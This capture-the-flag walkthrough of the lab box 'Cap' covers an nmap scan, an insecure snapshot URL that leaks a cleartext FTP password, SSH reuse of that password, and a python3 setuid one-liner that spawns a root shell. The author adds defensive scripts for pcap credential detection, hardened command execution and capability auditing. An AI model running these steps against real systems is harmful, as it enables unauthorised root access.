Cap

# Tools


## Getting User

### Nmap

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p21,22,80 10.129.73.189
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-15 01:36 EST
Nmap scan report for 10.129.73.189
Host is up (0.22s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.99 seconds
```

### Foothold
Going to http://10.129.73.189/, I see it is a Security Dashboard.

Browsing the site, I find a Security Snapshot page that captures a 5-second PCAP snapshot and then redirects me to http://10.129.73.189/data/1.
The snapshot ID in the URL is not tied to my session, so changing it to http://10.129.73.189/data/0 lets me download the first snapshot, taken by someone else.
The 0.pcap file contains an FTP login in cleartext:

```
34  2.626895  192.168.196.16  192.168.196.1   FTP  76  Response: 220 (vsFTPd 3.0.3)
36  4.126500  192.168.196.1   192.168.196.16  FTP  69  Request: USER nathan
38  4.126630  192.168.196.16  192.168.196.1   FTP  90  Response: 331 Please specify the password.
40  5.424998  192.168.196.1   192.168.196.16  FTP  78  Request: PASS Buck3tH4TF0RM3!
42  5.432387  192.168.196.16  192.168.196.1   FTP  79  Response: 230 Login successful.
```

Username: nathan
Password: Buck3tH4TF0RM3!
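The capture leaked the password because FTP sends USER and PASS as plain text, so anyone who can read a packet capture of the session can read the login. As an added example (not code from the original post), the script below parses a classic pcap file and flags FTP login commands the way a defender reviewing captures or a capture-handling service would want to: it reports that cleartext credentials crossed the wire, keeps the username so the account can be rotated, and redacts the password instead of copying it into another log. The sample capture is constructed in-line with struct (checksums are left at zero because the parser does not verify them); the IPs mirror the ones in the capture above, the password is a made-up value.

```python
import socket
import struct
from typing import List, Tuple

PCAP_MAGIC_LE = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def _build_ftp_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame carrying `payload` (constructed test data, zero checksums)."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    return eth + ip


def build_sample_pcap(username: str, password: str) -> bytes:
    """Constructed capture: the two client->server FTP commands that carry a login."""
    frames = [
        _build_ftp_frame("192.168.196.1", "192.168.196.16", 40000, FTP_PORT, f"USER {username}\r\n".encode()),
        _build_ftp_frame("192.168.196.1", "192.168.196.16", 40000, FTP_PORT, f"PASS {password}\r\n".encode()),
    ]
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def find_cleartext_ftp_logins(pcap: bytes) -> List[Tuple[str, str, str, str]]:
    """Walk a classic (non-pcapng) Ethernet capture and report FTP USER/PASS commands.

    Returns (src, dst, command, value). The PASS value is redacted so the finding can be
    logged or ticketed without the secret being copied along with it."""
    (magic,) = struct.unpack("<I", pcap[:4])
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "IHHiIII", pcap[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")

    findings = []
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        # Ethernet (14) + minimal IPv4 (20) is the smallest frame we can inspect.
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
            continue
        src = socket.inet_ntoa(ip[12:16])
        dst = socket.inet_ntoa(ip[16:20])
        tcp = ip[ihl:]
        dport = struct.unpack("!H", tcp[2:4])[0]
        if dport != FTP_PORT:
            continue
        data_off = (tcp[12] >> 4) * 4
        line = tcp[data_off:].split(b"\r\n", 1)[0].decode("ascii", "replace")
        if line.startswith("USER "):
            findings.append((src, dst, "USER", line[5:]))
        elif line.startswith("PASS "):
            findings.append((src, dst, "PASS", "<redacted>"))
    return findings


if __name__ == "__main__":
    for finding in find_cleartext_ftp_logins(build_sample_pcap("nathan", "example-password")):
        print(finding)
```

Run against a real file with `find_cleartext_ftp_logins(open("0.pcap", "rb").read())`; pcapng captures and non-Ethernet link types are rejected rather than silently producing no findings.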

Logging in over SSH with the credentials I found, I get the user flag.

```
┌──(kali㉿kali)-[~]
└─$ ssh nathan@10.129.73.189
The authenticity of host '10.129.73.189 (10.129.73.189)' can't be established.
ED25519 key fingerprint is: SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.73.189' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
nathan@10.129.73.189's password:
Permission denied, please try again.
nathan@10.129.73.189's password:
Permission denied, please try again.
nathan@10.129.73.189's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jan 15 07:38:43 UTC 2026

  System load:  0.08
  Usage of /:   36.8% of 8.73GB
  Memory usage: 22%
  Swap usage:   0%
  Processes:    227
  Users logged in: 0
  IPv4 address for eth0: 10.129.73.189
  IPv6 address for eth0: dead:beef::250:56ff:fe94:37b7

  => There are 4 zombie processes.


63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ ls
user.txt
```

## Getting Root

### Information Gathering

I find the /var/www/html folder, which contains the web app's files.

```
nathan@cap:/var/www/html$ ls
__pycache__  app.py  static  templates  upload
```

After reviewing app.py, I see that the capture function looks interesting.

```python
@app.route("/capture")
@limiter.limit("10 per minute")
def capture():

    get_lock()
    pcapid = get_appid()
    increment_appid()
    release_lock()

    path = os.path.join(app.root_path, "upload", str(pcapid) + ".pcap")
    ip = request.remote_addr
    # permissions issues with gunicorn and threads. hacky solution for now.
    #os.setuid(0)
    #command = f"timeout 5 tcpdump -w {path} -i any host {ip}"
    command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""
    os.system(command)
    #os.setuid(1000)

    return redirect("/data/" + str(pcapid))
```

Specifically this part, which launches a second python3 that calls os.setuid(0) and then runs the tcpdump command as root:

```python
command = f"""python3 -c 'import os; os.setuid(0); os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'"""
```
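The line above has two separate problems: the capture command is a shell string assembled with f-strings and executed through two shells, and the web worker relies on a helper interpreter that can switch to UID 0 at will. As an added example (not code from the original post or from the Cap application), the block below puts the vulnerable shape next to a hardened one: inputs are validated, the command is an argv list run without a shell, and the web process never changes UID. The function and parameter names (`capture_argv`, `run_capture`, `upload_dir`) are my own; the design assumes tcpdump itself holds the packet-capture file capabilities so that the Flask worker needs no root at all.

```python
import ipaddress
import subprocess
from pathlib import Path
from typing import List


def vulnerable_command(path: str, ip: str) -> str:
    """The shape used by app.py: a shell string built with f-strings, executed by a
    helper interpreter that first calls os.setuid(0). Everything it runs is root, and
    whatever reaches `path` or `ip` is parsed by two shells on the way."""
    return (f"""python3 -c 'import os; os.setuid(0); """
            f"""os.system("timeout 5 tcpdump -w {path} -i any host {ip}")'""")


def capture_argv(upload_dir: str, pcapid: int, ip: str, seconds: int = 5) -> List[str]:
    """Hardened form: validate every input, build an argv list (no shell), no setuid."""
    if not isinstance(pcapid, int) or pcapid < 0:
        raise ValueError("pcapid must be a non-negative integer")
    addr = ipaddress.ip_address(ip)  # ValueError for anything that is not an IP literal
    path = Path(upload_dir) / f"{pcapid}.pcap"  # filename derived from an int, not from input
    return ["timeout", str(seconds), "tcpdump", "-w", str(path), "-i", "any", "host", str(addr)]


def run_capture(upload_dir: str, pcapid: int, ip: str) -> int:
    """Run tcpdump with the validated argv and return its exit status.

    The web worker keeps its own unprivileged UID. The capture privilege lives on the
    tcpdump binary (cap_net_raw,cap_net_admin as file capabilities, assumed to be set
    by deployment), so nothing in this process can become root."""
    proc = subprocess.run(capture_argv(upload_dir, pcapid, ip), check=False)
    return proc.returncode


if __name__ == "__main__":
    print("vulnerable:", vulnerable_command("/var/www/html/upload/3.pcap", "10.10.14.7"))
    print("hardened:  ", capture_argv("/var/www/html/upload", 3, "10.10.14.7"))
```

With the argv form, a value such as `10.10.14.7; id` is rejected by `ipaddress.ip_address` before any process is spawned, and even a value that did get through would be a single argument to tcpdump rather than shell text.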

### Privilege Escalation

Running the same trick from nathan's shell gives us root. It works because the python3 interpreter on this host is allowed to switch to UID 0 from an unprivileged shell, something a normal binary cannot do without a setuid bit or the CAP_SETUID file capability, so the shell it spawns runs as root:

```
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```

Now we can grab the root flag.

```
nathan@cap:/var/www/html$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/var/www/html# cd /root
root@cap:/root#
```
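The root cause here is a privilege that was attached to a general-purpose interpreter instead of to the one program that needed it. As an added example (not code from the original post), the script below is the check a defender would run to find that kind of grant: it decodes the raw `security.capability` extended attribute that `setcap` writes (struct vfs_cap_data, revisions 1 to 3) and walks a directory tree reporting files whose permitted set includes a capability that allows a full root takeover, such as cap_setuid. The `sample_cap_blob` value is constructed in-line and corresponds to `cap_setuid,cap_net_bind_service+eip`; the scan itself assumes Linux, since it relies on `os.getxattr`.

```python
import os
import struct
from pathlib import Path
from typing import Dict, List, Tuple

# Layout of the security.capability xattr (struct vfs_cap_data, little-endian on disk).
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_1 = 0x01000000   # one 32-bit permitted/inheritable pair
VFS_CAP_REVISION_2 = 0x02000000   # two pairs, covering 64 capabilities
VFS_CAP_REVISION_3 = 0x03000000   # as v2, plus a rootid for user namespaces
VFS_CAP_FLAGS_EFFECTIVE = 0x1

# Subset of Linux capability numbers that matter for this check.
CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search", 3: "cap_fowner",
    6: "cap_setgid", 7: "cap_setuid", 10: "cap_net_bind_service", 12: "cap_net_admin",
    13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin",
}
# Capabilities that let a process become root, or read and write files as root.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_ptrace", "cap_sys_admin"}


def _names(mask: int) -> List[str]:
    return [CAP_NAMES.get(bit, f"cap_{bit}") for bit in range(64) if (mask >> bit) & 1]


def decode_vfs_caps(raw: bytes) -> Dict[str, object]:
    """Decode a raw security.capability blob into named permitted/inheritable sets."""
    (magic_etc,) = struct.unpack_from("<I", raw, 0)
    revision = magic_etc & VFS_CAP_REVISION_MASK
    if revision == VFS_CAP_REVISION_1:
        permitted, inheritable = struct.unpack_from("<II", raw, 4)
    elif revision in (VFS_CAP_REVISION_2, VFS_CAP_REVISION_3):
        p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<IIII", raw, 4)
        permitted = p_lo | (p_hi << 32)
        inheritable = i_lo | (i_hi << 32)
    else:
        raise ValueError(f"unknown vfs_cap_data revision 0x{revision:08x}")
    return {
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": _names(permitted),
        "inheritable": _names(inheritable),
    }


def risky_caps(raw: bytes) -> List[str]:
    """Permitted capabilities in the blob that allow a full root takeover."""
    return [c for c in decode_vfs_caps(raw)["permitted"] if c in HIGH_RISK]


def sample_cap_blob() -> bytes:
    """Constructed v2 blob equivalent to 'cap_setuid,cap_net_bind_service+eip'."""
    permitted = (1 << 7) | (1 << 10)
    return struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, permitted, 0, 0, 0)


def scan_for_risky_caps(root: str) -> List[Tuple[str, List[str]]]:
    """Walk `root` and report regular files whose permitted set contains a HIGH_RISK entry.

    Linux only (os.getxattr). Files without the xattr, or that we may not read, are skipped."""
    getxattr = getattr(os, "getxattr", None)
    if getxattr is None:
        raise RuntimeError("file capabilities are a Linux feature")
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            try:
                if path.is_symlink() or not path.is_file():
                    continue
                raw = getxattr(str(path), "security.capability", follow_symlinks=False)
            except OSError:
                continue
            bad = risky_caps(raw)
            if bad:
                hits.append((str(path), bad))
    return hits


if __name__ == "__main__":
    print("sample blob:", decode_vfs_caps(sample_cap_blob()))
    for path, caps in scan_for_risky_caps("/usr/bin"):
        print(f"{path}: {','.join(caps)}")
```

Point `scan_for_risky_caps` at `/` on a box to audit it; a hit on an interpreter such as python3, perl or node deserves the same attention as a setuid-root copy of that interpreter, because every script it runs inherits the grant. Packet capture needs only cap_net_raw and cap_net_admin on tcpdump, which is why those are not in `HIGH_RISK`.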